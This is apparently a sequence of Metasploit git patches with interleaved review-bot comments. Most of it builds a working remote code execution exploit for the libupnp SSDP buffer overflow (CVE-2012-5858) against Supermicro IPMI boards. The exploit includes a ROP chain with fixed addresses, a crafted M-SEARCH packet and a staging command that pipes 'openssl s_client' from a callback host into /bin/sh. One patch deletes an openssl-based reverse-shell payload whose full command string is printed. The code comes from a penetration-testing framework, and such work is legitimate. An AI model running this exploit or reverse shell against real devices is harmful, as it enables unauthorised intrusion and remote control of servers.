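Review bot: Every inconclusive exit in `run_host` (no reply to a probe, or the new early `return` on a 5xx) reports only through `vprint_status`, so in a non-verbose run a host that could not be tested looks the same as one that tested clean. Scanner output feeds patching decisions, so "not assessed" should be visible; printing the early-return cases with `print_error` would do it. The moved block also leaves two consecutive blank lines before the final `if`. `run_host` is spread over three hunks and begins before the first.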
--- a/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb +++ b/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb @@ -19,7 +19,10 @@ def initialize(info={}) This module attempts to identify Ruby on Rails instances vulnerable to an arbitrary object instantiation flaw in the XML request processor. }, - 'Author' => 'hdm', + 'Author' => [ + 'hdm', #author + 'jjarmoc' #improvements + ], 'License' => MSF_LICENSE, 'References' => [ From 5be4d414204637296d6463dff5965ea25bfc84e3 Mon Sep 17 00:00:00 2001 From: HD Moore <hd_moore@rapid7.com> Date: Sun, 3 Feb 2013 17:35:14 -0600 Subject: [PATCH 244/421] This is redundant/less-reliable than reverse_openssl --- .../cmd/unix/reverse_openssl_double.rb | 68 ------------------- 1 file changed, 68 deletions(-) delete mode 100644 modules/payloads/singles/cmd/unix/reverse_openssl_double.rb diff --git a/modules/payloads/singles/cmd/unix/reverse_openssl_double.rb b/modules/payloads/singles/cmd/unix/reverse_openssl_double.rb deleted file mode 100644 index 2343ed2d69fd..000000000000 --- a/modules/payloads/singles/cmd/unix/reverse_openssl_double.rb +++ /dev/null 
@@ -1,68 +0,0 @@
-##
-# $Id$
-##
-
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# web site for more information on licensing and terms of use.
-# http://metasploit.com/
-##
-
-require 'msf/core'
-require 'msf/core/handler/reverse_tcp_double_ssl'
-require 'msf/base/sessions/command_shell'
-require 'msf/base/sessions/command_shell_options'
-
-module Metasploit3
-
- include Msf::Payload::Single
- include Msf::Sessions::CommandShellOptions
-
- def initialize(info = {})
- super(merge_info(info,
- 'Name' => 'Unix Command Shell, Double reverse TCP SSL (openssl)',
- 'Version' => '$Revision$',
- 'Description' => 'Creates an interactive shell through two openssl encrypted inbound connections',
- 'Author' => [
- 'hdm', # Original module
- 'RageLtMan', # SSL support
- ],
- 'License' => MSF_LICENSE,
- 'Platform' => 'unix',
- 'Arch' => ARCH_CMD,
- 'Handler' => Msf::Handler::ReverseTcpDoubleSsl,
- 'Session' => Msf::Sessions::CommandShell,
- 'PayloadType' => 'cmd',
- 'RequiredCmd' => 'telnet',
- 'Payload' =>
- {
- 'Offsets' => { },
- 'Payload' => ''
- }
- ))
- end
-
- #
- # Constructs the payload
- #
- def generate
- vprint_good(command_string)
- return super + command_string
- end
-
- #
- # Returns the command string to use for execution
- #
- def command_string
- lhost = datastore['LHOST']
- ver = Rex::Socket.is_ipv6?(lhost) ? "6" : ""
- lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
- cmd = ''
- cmd += "openssl s_client -connect #{lhost}:#{datastore['LPORT']}|"
- cmd += "/bin/sh -i|openssl s_client -connect #{lhost}:#{datastore['LPORT']}"
- cmd += " >/dev/null 2>&1 &\n"
- return cmd
- end
-
-end
From 47f3c09616149fc5059d4f4b30c7e56afa4b513e Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com> Date: Sun, 3 Feb 2013 17:38:19 -0600 Subject: [PATCH 245/421] Fix typo that snuck in during merge --- .../payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb b/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb index 67af0c90728f..593e69d71612 100644 --- a/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb +++ b/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb @@ -31,7 +31,7 @@ def initialize(info = {}) 'License' => MSF_LICENSE, 'Platform' => 'unix', 'Arch' => ARCH_CMD, - 'Handler' => Msf::Handler::ReverseTcpDoubleSsl, + 'Handler' => Msf::Handler::ReverseTcpDoubleSSL, 'Session' => Msf::Sessions::CommandShell, 'PayloadType' => 'cmd', 'RequiredCmd' => 'telnet', @@ -47,7 +47,7 @@ def initialize(info = {}) # Constructs the payload # def generate - + return super + command_string end From 797e2604a0169068120557a27f414b7a5d44ee0b Mon Sep 17 00:00:00 2001 From: HD Moore <hd_moore@rapid7.com> Date: Sun, 3 Feb 2013 17:41:45 -0600 Subject: [PATCH 246/421] Fix missing require in reverse_tcp_ssl --- lib/msf/core/handler/reverse_tcp_ssl.rb | 2 ++ 1 file changed, 2 insertions(+) diff --git a/lib/msf/core/handler/reverse_tcp_ssl.rb b/lib/msf/core/handler/reverse_tcp_ssl.rb index 60f827c7ab97..996b619b07f7 100644 --- a/lib/msf/core/handler/reverse_tcp_ssl.rb +++ b/lib/msf/core/handler/reverse_tcp_ssl.rb @@ -1,6 +1,8 @@ require 'rex/socket' require 'thread' +require 'msf/core/handler/reverse_tcp' + module Msf module Handler From 975230c9e7d3144023f69bea96170d4a8c6e934b Mon Sep 17 00:00:00 2001 
From: HD Moore <hd_moore@rapid7.com> Date: Sun, 3 Feb 2013 17:46:20 -0600 Subject: [PATCH 247/421] Add the first module for unique_service_name() --- .../multi/upnp/libupnp_ssdp_overflow.rb | 244 ++++++++++++++++++ 1 file changed, 244 insertions(+) create mode 100644 modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb diff --git a/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb b/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb new file mode 100644 index 000000000000..4e471fbc443c --- /dev/null +++ b/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb 
@@ -0,0 +1,244 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::Udp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Portable UPnP SDK unique_service_name() Remote Code Execution', + 'Description' => %q{ + This module exploits a buffer overflow in the unique_service_name() + function of libupnp's SSDP processor. The libupnp library is used across + thousands of devices and is referred to as the Intel SDK for UPnP + Devices or the Portable SDK for UPnP Devices. + + Due to size limitations on many devices, this exploit uses a separate TCP + listener to stage the real payload. + }, + 'Author' => [ + 'hdm', + 'Alex Eubanks <endeavor[at]rainbowsandpwnies.com>' + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2012-5858' ] + ], + 'Platform' => ['unix'], + 'Arch' => ARCH_CMD, + 'Privileged' => true, + 'Payload' => + { + + 'BadChars' => + # Bytes 0-8 are not allowed + [*(0..8)].pack("C*") + + # 0x09, 0x0a, 0x0d are allowed + "\x0b\x0c\x0e\x0f" + + # All remaining bytes up to space are restricted + [*(0x10..0x1f)].pack("C*") + + # Also not allowed + "\x7f\x3a" + + # Breaks our string quoting + "\x22", + + # Unlimited since we stage this over a secondary connection + 'Space' => 8000, + 'DisableNops' => true, + 'Compat' => + { + 'PayloadType' => 'cmd', + # specific payloads vary widely by device (openssl for IPMI, etc) + } + }, + 'Targets' => + [ + # + # ROP targets are difficult to represent in the hash, use callbacks instead + # + [ "Supermicro Onboard IPMI (X7SPA-HF, X9SCL, X9SCM) Intel SDK 1.3.1", { + :callback => :target_supermicro_ipmi_131 + # SSDP response: + # UPnP/1.0, Intel SDK for UPnP devices/1.3.1 + # 
http://192.168.x.x:49160/IPMIdevicedesc.xml + # uuid:Upnp-IPMI-1_0-1234567890001::upnp:rootdevice + } ] + ], + 'DisclosureDate' => 'Feb 03 2013')) + + register_options( + [ + Opt::RPORT(1900), + OptAddress.new('CBHOST', [ false, "The listener address used for staging the real payload" ]), + OptPort.new('CBPORT', [ false, "The listener port used for staging the real payload" ]) + ], self.class) + end + + def exploit + + unless self.respond_to?(target[:callback]) + print_error("Invalid target specified: no callback function defined") + return + end + + buffer = self.send(target[:callback]) + pkt = + "M-SEARCH * HTTP/1.1\r\n" + + "Host:239.255.255.250:1900\r\n" + + "ST:uuid:schemas:device:" + buffer + ":" + "end" + "\r\n" + # Rex::Text.rand_text_alpha(3) + "Man:\"ssdp:discover\"\r\n" + + "MX:3\r\n\r\n" + + print_status("Sending #{pkt.length} bytes to #{rhost}:#{rport}...") + connect_udp + udp_sock.put(pkt) + + 1.upto(5) do + ::IO.select(nil, nil, nil, 1) + break if session_created? + end + + handler + disconnect_udp + end + + # These devices are armle, run version 1.3.1 of libupnp, have random stacks, but no PIE on libc + def target_supermicro_ipmi_131 + + # Create a fixed-size buffer for the payload + buffer = Rex::Text.rand_text_alpha(2000) + + # Place the entire buffer inside of double-quotes to take advantage of is_qdtext_char() + buffer[1,1] = '"' + buffer[1900,1] = '"' + + # Prefer CBHOST, but use LHOST, or autodetect the IP otherwise + cbhost = datastore['CBHOST'] || datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST']) + + # Start a listener + start_listener(true) + + # Figure out the port we picked + cbport = self.service.getsockname[2] + + # Restart the service and use openssl to stage the real payload + # Staged because only ~150 bytes of contiguous data are available before mangling + cmd = "sleep 1;/bin/upnp_dev & echo; openssl s_client -quiet -host #{cbhost} -port #{cbport}|/bin/sh;exit;#" + buffer[432, cmd.length] = cmd + + # Adjust $r3 
to point from the bottom of the stack back into our buffer + buffer[304,4] = [0x4009daf8].pack("V") # + # 0x4009daf8: add r3, r3, r4, lsl #2 + # 0x4009dafc: ldr r0, [r3, #512] ; 0x200 + # 0x4009db00: pop {r4, r10, pc} + + # The offset (right-shifted by 2 ) to our command string above + buffer[284,4] = [0xfffffe78].pack("V") # + + # Copy $r3 into $r0 + buffer[316,4] = [0x400db0ac].pack("V") + # 0x400db0ac <_IO_wfile_underflow+1184>: sub r0, r3, #1 + # 0x400db0b0 <_IO_wfile_underflow+1188>: pop {pc} ; (ldr pc, [sp], #4) + + # Move our stack pointer down so as not to corrupt our payload + buffer[320,4] = [0x400a5568].pack("V") + # 0x400a5568 <__default_rt_sa_restorer_v2+5448>: add sp, sp, #408 ; 0x198 + # 0x400a556c <__default_rt_sa_restorer_v2+5452>: pop {r4, r5, pc} + + # Finally return to system() with $r0 pointing to our string + buffer[141,4] = [0x400add8c].pack("V") + + return buffer +=begin + 00008000-00029000 r-xp 00000000 08:01 709233 /bin/upnp_dev + 00031000-00032000 rwxp 00021000 08:01 709233 /bin/upnp_dev + 00032000-00055000 rwxp 00000000 00:00 0 [heap] + 40000000-40015000 r-xp 00000000 08:01 709562 /lib/ld-2.3.5.so + 40015000-40017000 rwxp 00000000 00:00 0 + 4001c000-4001d000 r-xp 00014000 08:01 709562 /lib/ld-2.3.5.so + 4001d000-4001e000 rwxp 00015000 08:01 709562 /lib/ld-2.3.5.so + 4001e000-4002d000 r-xp 00000000 08:01 709535 /lib/libpthread-0.10.so + 4002d000-40034000 ---p 0000f000 08:01 709535 /lib/libpthread-0.10.so + 40034000-40035000 r-xp 0000e000 08:01 709535 /lib/libpthread-0.10.so + 40035000-40036000 rwxp 0000f000 08:01 709535 /lib/libpthread-0.10.so + 40036000-40078000 rwxp 00000000 00:00 0 + 40078000-40180000 r-xp 00000000 08:01 709620 /lib/libc-2.3.5.so + 40180000-40182000 r-xp 00108000 08:01 709620 /lib/libc-2.3.5.so + 40182000-40185000 rwxp 0010a000 08:01 709620 /lib/libc-2.3.5.so + 40185000-40187000 rwxp 00000000 00:00 0 + bd600000-bd601000 ---p 00000000 00:00 0 + bd601000-bd800000 rwxp 00000000 00:00 0 + bd800000-bd801000 ---p 00000000 
00:00 0 + bd801000-bda00000 rwxp 00000000 00:00 0 + bdc00000-bdc01000 ---p 00000000 00:00 0 + bdc01000-bde00000 rwxp 00000000 00:00 0 + be000000-be001000 ---p 00000000 00:00 0 + be001000-be200000 rwxp 00000000 00:00 0 + be941000-be956000 rwxp 00000000 00:00 0 [stack] +=end + + end + + def stage_real_payload(cli) + print_good("Sending payload of #{payload.encoded.length} bytes to #{cli.peerhost}:#{cli.peerport}...") + cli.put(payload.encoded + "\n") + end + + def start_listener(ssl = false) + + comm = datastore['ListenerComm'] + if comm == "local" + comm = ::Rex::Socket::Comm::Local + else + comm = nil + end + + self.service = Rex::Socket::TcpServer.create( + 'LocalPort' => datastore['CBPORT'], + 'SSL' => ssl, + 'SSLCert' => datastore['SSLCert'], + 'Comm' => comm, + 'Context' => + { + 'Msf' => framework, + 'MsfExploit' => self, + }) + + self.service.on_client_connect_proc = Proc.new { |client| + stage_real_payload(client) + } + + # Start the listening service + self.service.start + end + + # + # Shut down any running services + # + def cleanup + super + if self.service + print_status("Shutting down payload stager listener...") + begin + self.service.deref if self.service.kind_of?(Rex::Service) + if self.service.kind_of?(Rex::Socket) + self.service.close + self.service.stop + end + self.service = nil + rescue ::Exception + end + end + end + + attr_accessor :service +end From 94953d04506404b7886ce9daf773ad912c8b35fb Mon Sep 17 00:00:00 2001 From: HD Moore <hd_moore@rapid7.com> Date: Sun, 3 Feb 2013 17:48:13 -0600 Subject: [PATCH 248/421] Fix idents from copypasta --- modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb b/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb index 4e471fbc443c..a799eb3a3c6e 100644 --- a/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb +++ b/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb 
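Review bot: `cleanup` ends with `rescue ::Exception` and an empty body, which also swallows `Interrupt` and `SystemExit` and hides any failure to release the staging listener, so a port can stay bound with nothing in the log. Rescuing `::StandardError => e` and reporting it, e.g. `vprint_error("Listener shutdown failed: #{e.class} #{e}")`, keeps the best-effort behaviour without silencing everything. In the same method the `Rex::Socket` branch calls `close` and then `stop` on the same object, which looks redundant and is worth confirming against the server class. Separately, the `[ 'CVE', '2012-5858' ]` reference should be checked against the libupnp advisory, since findings are correlated on that identifier.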
@@ -94,9 +94,9 @@ def exploit pkt = "M-SEARCH * HTTP/1.1\r\n" + "Host:239.255.255.250:1900\r\n" + - "ST:uuid:schemas:device:" + buffer + ":" + "end" + "\r\n" + # Rex::Text.rand_text_alpha(3) - "Man:\"ssdp:discover\"\r\n" + - "MX:3\r\n\r\n" + "ST:uuid:schemas:device:" + buffer + ":" + "end" + "\r\n" + # Rex::Text.rand_text_alpha(3) + "Man:\"ssdp:discover\"\r\n" + + "MX:3\r\n" print_status("Sending #{pkt.length} bytes to #{rhost}:#{rport}...") connect_udp From 214a60aa01e7286a0cca4f61ac6af768f9ac6373 Mon Sep 17 00:00:00 2001 From: HD Moore <hd_moore@rapid7.com> Date: Sun, 3 Feb 2013 17:52:33 -0600 Subject: [PATCH 249/421] iFix spacing --- modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb b/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb index a799eb3a3c6e..30f9146db29b 100644 --- a/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb +++ b/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb @@ -22,7 +22,7 @@ def initialize(info = {}) Devices or the Portable SDK for UPnP Devices. Due to size limitations on many devices, this exploit uses a separate TCP - listener to stage the real payload. + listener to stage the real payload. }, 'Author' => [ 'hdm', @@ -94,7 +94,7 @@ def exploit pkt = "M-SEARCH * HTTP/1.1\r\n" + "Host:239.255.255.250:1900\r\n" + - "ST:uuid:schemas:device:" + buffer + ":" + "end" + "\r\n" + # Rex::Text.rand_text_alpha(3) + "ST:uuid:schemas:device:" + buffer + ":end\r\n" + "Man:\"ssdp:discover\"\r\n" + "MX:3\r\n" From 1f227243b8a2d7ea724b3f72e38ffb14011fbe61 Mon Sep 17 00:00:00 2001 From: HD Moore <hd_moore@rapid7.com> Date: Sun, 3 Feb 2013 17:54:25 -0600 Subject: [PATCH 250/421] Make it clear BadChars are ignored --- .../multi/upnp/libupnp_ssdp_overflow.rb | 27 ++++++++++--------- 1 file changed, 15 insertions(+), 12 deletions(-) 
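Review bot: The last changed line of the first `@@ -94,9 +94,9 @@` hunk turns `"MX:3\r\n\r\n"` into `"MX:3\r\n"`, which changes the bytes sent rather than the indentation the subject line describes. Without the empty line the M-SEARCH header block is no longer terminated, so a receiver that parses strictly may treat the request as incomplete. Keep `"MX:3\r\n\r\n"` in this commit, or make the terminator change a separate commit whose message gives the reason. The body of `exploit` starts and ends outside the hunk.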
diff --git a/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb b/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb index 30f9146db29b..6e6202a3abea 100644 --- a/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb +++ b/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb @@ -38,18 +38,21 @@ def initialize(info = {}) 'Privileged' => true, 'Payload' => { - - 'BadChars' => - # Bytes 0-8 are not allowed - [*(0..8)].pack("C*") + - # 0x09, 0x0a, 0x0d are allowed - "\x0b\x0c\x0e\x0f" + - # All remaining bytes up to space are restricted - [*(0x10..0x1f)].pack("C*") + - # Also not allowed - "\x7f\x3a" + - # Breaks our string quoting - "\x22", +# +# # The following BadChars do not apply since we stage the payload +# # through a secondary connection. This is just for reference. +# +# 'BadChars' => +# # Bytes 0-8 are not allowed +# [*(0..8)].pack("C*") + +# # 0x09, 0x0a, 0x0d are allowed +# "\x0b\x0c\x0e\x0f" + +# # All remaining bytes up to space are restricted +# [*(0x10..0x1f)].pack("C*") + +# # Also not allowed +# "\x7f\x3a" + +# # Breaks our string quoting +# "\x22", # Unlimited since we stage this over a secondary connection 'Space' => 8000, From 9e491f0b1c58129f9464245dfdd089874329ffef Mon Sep 17 00:00:00 2001 From: HD Moore <hd_moore@rapid7.com> Date: Sun, 3 Feb 2013 18:03:19 -0600 Subject: [PATCH 251/421] Add a fingerprint string and more comments --- .../multi/upnp/libupnp_ssdp_overflow.rb | 21 ++++++++++++++----- 1 file changed, 16 insertions(+), 5 deletions(-) diff --git a/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb b/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb index 6e6202a3abea..e5b2f8fccedc 100644 --- a/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb +++ b/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb 
@@ -68,12 +68,23 @@ def initialize(info = {}) # # ROP targets are difficult to represent in the hash, use callbacks instead # - [ "Supermicro Onboard IPMI (X7SPA-HF, X9SCL, X9SCM) Intel SDK 1.3.1", { - :callback => :target_supermicro_ipmi_131 + [ "Supermicro Onboard IPMI (X9SCL/X9SCM) Intel SDK 1.3.1", { + + # The callback handles all target-specific settings + :callback => :target_supermicro_ipmi_131, + + # This matches the Server header of a SSDP reply + :fingerprint_server => + /Linux\/2\.6\.17\.WB_WPCM450\.1\.3 UPnP\/1\.0, Intel SDK for UPnP devices\/1\.3\.1/ + + # # SSDP response: - # UPnP/1.0, Intel SDK for UPnP devices/1.3.1 - # http://192.168.x.x:49160/IPMIdevicedesc.xml - # uuid:Upnp-IPMI-1_0-1234567890001::upnp:rootdevice + # Linux/2.6.17.WB_WPCM450.1.3 UPnP/1.0, Intel SDK for UPnP devices/1.3.1 + # http://192.168.xx.xx:49152/IPMIdevicedesc.xml + # uuid:Upnp-IPMI-1_0-1234567890001::upnp:rootdevice + + # Approximately 35,000 of these found in the wild via critical.io scans (2013-02-03) + } ] ], 'DisclosureDate' => 'Feb 03 2013')) From c24da99104bf89802a6cb1934fc26ae2b07bfea4 Mon Sep 17 00:00:00 2001 From: HD Moore <hd_moore@rapid7.com> Date: Sun, 3 Feb 2013 18:13:28 -0600 Subject: [PATCH 252/421] Update authors, add Richard (thanks!) --- modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb b/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb index e5b2f8fccedc..7ddbff922fc0 100644 --- a/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb +++ b/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb 
@@ -25,8 +25,9 @@ def initialize(info = {}) listener to stage the real payload. }, 'Author' => [ - 'hdm', - 'Alex Eubanks <endeavor[at]rainbowsandpwnies.com>' + 'hdm', # Exploit dev for Supermicro IPMI + 'Alex Eubanks <endeavor[at]rainbowsandpwnies.com>' # Exploit dev for Supermicro IPMI + 'Richard Harman <richard[at]richardharman.com>' # Binaries, system info, testing for Supermicro IPMI ], 'License' => MSF_LICENSE, 'References' => From 42c8a2d2655609563133138d6e8dfc78046d4a28 Mon Sep 17 00:00:00 2001 From: HD Moore <hd_moore@rapid7.com> Date: Sun, 3 Feb 2013 18:17:51 -0600 Subject: [PATCH 253/421] Add VU and blog references --- modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb b/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb index 7ddbff922fc0..efc99b7ec005 100644 --- a/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb +++ b/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb @@ -32,7 +32,9 @@ def initialize(info = {}) 'License' => MSF_LICENSE, 'References' => [ - [ 'CVE', '2012-5858' ] + [ 'CVE', '2012-5858' ], + [ 'US-CERT-VU', '922681' ], + [ 'URL', 'https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play' ] ], 'Platform' => ['unix'], 'Arch' => ARCH_CMD, From 0660347fca6afab5e3640c95722b06dd0409311e Mon Sep 17 00:00:00 2001 From: HD Moore <hd_moore@rapid7.com> Date: Sun, 3 Feb 2013 21:06:57 -0600 Subject: [PATCH 254/421] Explicit mult-line match --- modules/auxiliary/scanner/upnp/ssdp_msearch.rb | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/modules/auxiliary/scanner/upnp/ssdp_msearch.rb b/modules/auxiliary/scanner/upnp/ssdp_msearch.rb index fba5a396e7c2..48990169786a 100644 --- a/modules/auxiliary/scanner/upnp/ssdp_msearch.rb +++ b/modules/auxiliary/scanner/upnp/ssdp_msearch.rb 
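Review bot: The `'Author'` array in the `@@ -25,8 +25,9 @@` hunk is missing a comma after the `'Alex Eubanks <endeavor[at]rainbowsandpwnies.com>'` entry, so the newly added `'Richard Harman …'` string follows it with no separator. As far as I can tell Ruby rejects that as a syntax error, which would stop the module from loading at all. Add the comma before the trailing comment: `'Alex Eubanks <endeavor[at]rainbowsandpwnies.com>', # Exploit dev for Supermicro IPMI`.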
@@ -38,7 +38,7 @@ def setup "ST:upnp:rootdevice\r\n" + "Man:\"ssdp:discover\"\r\n" + "MX:3\r\n" + - "\r\n\r\n" # Non-standard, but helps + "\r\n" end def scanner_prescan(batch) @@ -144,14 +144,14 @@ def scanner_process(data, shost, sport) } } - if data =~ /^Server:[\s]*(.*)/i + if data =~ /^Server:[\s]*(.*)/mi @results[skey][:info][:server] = $1.strip end ssdp_host = nil ssdp_port = 80 location_string = '' - if data =~ /^Location:[\s]*(.*)/i + if data =~ /^Location:[\s]*(.*)/mi location_string = $1 @results[skey][:info][:location] = $1.strip if location_string[/(https?):\x2f\x2f([^\x5c\x2f]+)/] @@ -168,7 +168,7 @@ def scanner_process(data, shost, sport) end end - if data =~ /^USN:[\s]*(.*)/i + if data =~ /^USN:[\s]*(.*)/mi @results[skey][:info][:usn] = $1.strip end From 9379c68e512c78f3d94f1baad86445de5dc690a1 Mon Sep 17 00:00:00 2001 From: HD Moore <hd_moore@rapid7.com> Date: Sun, 3 Feb 2013 21:23:05 -0600 Subject: [PATCH 255/421] Fix typo, auto-fingerprint, unconnected sockets --- .../multi/upnp/libupnp_ssdp_overflow.rb | 109 +++++++++++++++--- 1 file changed, 92 insertions(+), 17 deletions(-) diff --git a/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb b/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb index efc99b7ec005..85df37ca44ae 100644 --- a/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb +++ b/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb @@ -10,8 +10,6 @@ class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking - include Msf::Exploit::Remote::Udp - def initialize(info = {}) super(update_info(info, 'Name' => 'Portable UPnP SDK unique_service_name() Remote Code Execution', 
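Review bot: Adding the `m` flag in the `@@ -144,14 +144,14 @@` hunk makes `(.*)` run to the end of the datagram, because in Ruby `/m` lets `.` match newlines while `^` already matches at every line start without it. `$1.strip` for `Server:` and `Location:` (and `USN:` in the `@@ -168,7 +168,7 @@` hunk) then holds the header value plus every line after it. These values come from an untrusted responder and go straight into `@results[skey][:info]`, so one reply can put arbitrary extra lines into what the scanner stores and reports. Drop the flag and bound the capture to one line, for example `if data =~ /^Server:[ \t]*([^\r\n]*)/i`, with the same form for `Location:` and `USN:`. `[\s]*` has the related problem that an empty header value lets it consume the line break and capture the next line. `scanner_process` starts and ends outside these hunks.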
@@ -26,7 +24,7 @@ def initialize(info = {}) }, 'Author' => [ 'hdm', # Exploit dev for Supermicro IPMI - 'Alex Eubanks <endeavor[at]rainbowsandpwnies.com>' # Exploit dev for Supermicro IPMI + 'Alex Eubanks <endeavor[at]rainbowsandpwnies.com>', # Exploit dev for Supermicro IPMI 'Richard Harman <richard[at]richardharman.com>' # Binaries, system info, testing for Supermicro IPMI ], 'License' => MSF_LICENSE, @@ -68,6 +66,9 @@ def initialize(info = {}) }, 'Targets' => [ + + [ "Automatic", { } ], + # # ROP targets are difficult to represent in the hash, use callbacks instead # @@ -76,9 +77,9 @@ def initialize(info = {}) # The callback handles all target-specific settings :callback => :target_supermicro_ipmi_131, - # This matches the Server header of a SSDP reply - :fingerprint_server => - /Linux\/2\.6\.17\.WB_WPCM450\.1\.3 UPnP\/1\.0, Intel SDK for UPnP devices\/1\.3\.1/ + # This matches any line of the SSDP M-SEARCH response + :fingerprint => + /Server:\s*(.*|Linux\/2\.6\.17\.WB_WPCM450\.1\.3) UPnP\/1\.0, Intel SDK for UPnP devices\/1\.3\.1/mi # # SSDP response: 
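Review bot: The new `:fingerprint` in the `@@ -76,9 +77,9 @@` hunk no longer identifies the hardware, because the `.*` alternative in `(.*|Linux\/2\.6\.17\.WB_WPCM450\.1\.3)` matches any text. With `/mi` that text can also span lines, so any reply mentioning `Intel SDK for UPnP devices/1.3.1` selects this target. The callback for this target uses fixed addresses, so a match on a different device would most likely just crash its UPnP service. Require the kernel string explicitly: `/Server:\s*Linux\/2\.6\.17\.WB_WPCM450\.1\.3 UPnP\/1\.0, Intel SDK for UPnP devices\/1\.3\.1/i`. The `m` flag is not needed once the `.*` is gone.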
@@ -90,44 +91,52 @@ def initialize(info = {}) } ] ], - 'DisclosureDate' => 'Feb 03 2013')) + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Jan 29 2013')) register_options( [ + Opt::RHOST(), Opt::RPORT(1900), OptAddress.new('CBHOST', [ false, "The listener address used for staging the real payload" ]), OptPort.new('CBPORT', [ false, "The listener port used for staging the real payload" ]) ], self.class) end + def exploit - unless self.respond_to?(target[:callback]) + configure_socket + + target_info = choose_target + + unless self.respond_to?(target_info[:callback]) print_error("Invalid target specified: no callback function defined") return end - buffer = self.send(target[:callback]) + buffer = self.send(target_info[:callback]) pkt = "M-SEARCH * HTTP/1.1\r\n" + "Host:239.255.255.250:1900\r\n" + "ST:uuid:schemas:device:" + buffer + ":end\r\n" + "Man:\"ssdp:discover\"\r\n" + - "MX:3\r\n" + "MX:3\r\n\r\n" + + print_status("Exploiting #{rhost} with target '#{target_info.name}' with #{pkt.length} bytes to port #{rport}...") - print_status("Sending #{pkt.length} bytes to #{rhost}:#{rport}...") - connect_udp - udp_sock.put(pkt) + r = udp_sock.sendto(pkt, rhost, rport, 0) 1.upto(5) do ::IO.select(nil, nil, nil, 1) break if session_created? end - handler - disconnect_udp + # No handler() support right now end + + # These devices are armle, run version 1.3.1 of libupnp, have random stacks, but no PIE on libc def target_supermicro_ipmi_131 @@ -135,8 +144,8 @@ def target_supermicro_ipmi_131 buffer = Rex::Text.rand_text_alpha(2000) # Place the entire buffer inside of double-quotes to take advantage of is_qdtext_char() - buffer[1,1] = '"' - buffer[1900,1] = '"' + buffer[0,1] = '"' + buffer[1999,1] = '"' # Prefer CBHOST, but use LHOST, or autodetect the IP otherwise cbhost = datastore['CBHOST'] || datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST']) 
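Review bot: In `exploit` (hunk `@@ -90,44 +91,52 @@`) the result of the send is stored in `r` and never read, so a send that failed locally looks the same as a device that did not respond. Either drop the assignment, `udp_sock.sendto(pkt, rhost, rport, 0)`, or check the value and report the failure before entering the wait loop. The replacement comment `# No handler() support right now` should also say why the `handler` call was removed, since the loop above it still polls `session_created?`.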
